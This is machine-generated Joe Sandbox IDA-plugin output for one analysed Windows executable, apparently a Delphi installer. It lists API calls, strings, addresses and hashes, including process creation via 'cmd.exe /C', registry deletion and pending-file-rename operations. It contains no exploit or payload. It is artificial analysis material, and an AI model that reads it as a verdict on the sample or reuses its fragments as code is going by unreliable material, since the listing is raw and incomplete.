• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
• String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
• API String ID: 4130936913-2943970505
• Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
• Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
• Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
• Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
  • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
  • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
  • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
  • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
• API String ID: 854858120-3415487018
• Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
• Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
• Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
• Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759
APIs
• LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
• GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
• OemToCharA.USER32(?,?), ref: 0042376C
• CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
• Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
• Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
• Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
• Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
• GetCurrentThreadId.KERNEL32 ref: 00418F89
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
  • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
  • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
  • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
  • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
  • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
  • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
  • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
  • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
  • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
  • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
  • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
  • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
• String ID: ControlOfs%.8X%.8X$Delphi%.8X
• API String ID: 3476490787-2767913252
• Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
• Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
• Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
• Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
• GetWindowLongA.USER32(?,000000F0), ref: 0041367F
• GetWindowLongA.USER32(?,000000F4), ref: 00413691
• SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
• SetPropA.USER32(?,00000000,00000000), ref: 004136BB
• SetPropA.USER32(?,00000000,00000000), ref: 004136D2
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: LongWindow$Prop
• String ID:
• API String ID: 3887896539-0
• Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
• Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
• Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
• Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
Strings
• WININIT.INI, xrefs: 00454D00
• PendingFileRenameOperations, xrefs: 00454C70
• PendingFileRenameOperations2, xrefs: 00454CA0
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
• API String ID: 47109696-2199428270
• Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
• Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
• Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
• Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: $pI$.tmp$oI
                                                                                            • API String ID: 1375471231-740224434
                                                                                            • Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                                            • Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
                                                                                            • Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                                            • Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9
                                                                                            APIs
                                                                                            • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                            • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnumLongWindows
                                                                                            • String ID: lAB
                                                                                            • API String ID: 4191631535-3476862382
                                                                                            • Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                                            • Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
                                                                                            • Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                                            • Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
                                                                                            APIs
                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                            • API String ID: 588496660-1846899949
                                                                                            • Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                                            • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                                            • Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                                            • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                            • String ID: $Need to restart Windows? %s
                                                                                            • API String ID: 1160245247-4200181552
                                                                                            • Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                                            • Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
                                                                                            • Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                                            • Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D
                                                                                            APIs
                                                                                              • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                            • GetLastError.KERNEL32(00000000,0046ECBD,?,?,0049B178,00000000), ref: 0046EB9A
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046EC14
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EC39
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                            • String ID: Creating directory: %s
                                                                                            • API String ID: 2451617938-483064649
                                                                                            • Opcode ID: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                                            • Instruction ID: f0101e926757b7a11f3b593987eb06ddc2bdb0e2c9eeffddc738206aa7aee8b3
                                                                                            • Opcode Fuzzy Hash: dd72d35f99a1f7cf9252cc8b2633e3cd9bb4dbaac2467c86bd15beaee95be6ae
                                                                                            • Instruction Fuzzy Hash: 3B512474E00248ABDB01DFA6C582BDEBBF5AF49304F50857AE811B7382D7785E04CB99
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 0045439E
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454464), ref: 00454408
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                            • API String ID: 2508298434-591603554
                                                                                            • Opcode ID: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                                            • Instruction ID: a5147c4f4f255c42d32950ca2538ad48b34b390a13f5ea4f7af4ed8f8aa420c4
                                                                                            • Opcode Fuzzy Hash: 9c462d7790975d7fe4884a590e564be15d8bb14fea0c08802be5edcc9b4e892a
                                                                                            • Instruction Fuzzy Hash: B841A770A403189FEB10DB55DC85B9E77B8AB45309F5080BBB808A7293E7785F89CE5D
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                            • RegisterClassA.USER32(?), ref: 004164DE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$InfoRegisterUnregister
                                                                                            • String ID: @
                                                                                            • API String ID: 3749476976-2766056989
                                                                                            • Opcode ID: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                                            • Instruction ID: 7a3367fafc14ce9f55c1362753e540655f5bf3363bc6823d1bccf2610c9c9706
                                                                                            • Opcode Fuzzy Hash: 428ee8849785124313965255ef08df1f1b4e8ea786c68e07a6e4b7e1ebd76e39
                                                                                            • Instruction Fuzzy Hash: 8F3180706042009BD760EF68C881B9B77E5AB85308F00457FF945DB392DB3ED9448B6A
                                                                                            APIs
                                                                                            • 74D31520.VERSION(00000000,?,?,?,j]I), ref: 00451B90
                                                                                            • 74D31500.VERSION(00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BBD
                                                                                            • 74D31540.VERSION(?,00451C34,?,?,00000000,?,00000000,?,00000000,00451C0B,?,00000000,?,?,?,j]I), ref: 00451BD7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: D31500D31520D31540
                                                                                            • String ID: j]I
                                                                                            • API String ID: 1003763464-3121892809
                                                                                            • Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                            • Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
                                                                                            • Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
                                                                                            • Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateErrorLastProcess
                                                                                            • String ID: XtE$ptE
                                                                                            • API String ID: 2919029540-3149052308
                                                                                            • Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                            • Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
                                                                                            • Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
                                                                                            • Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64
                                                                                            APIs
                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                              • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                                              • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
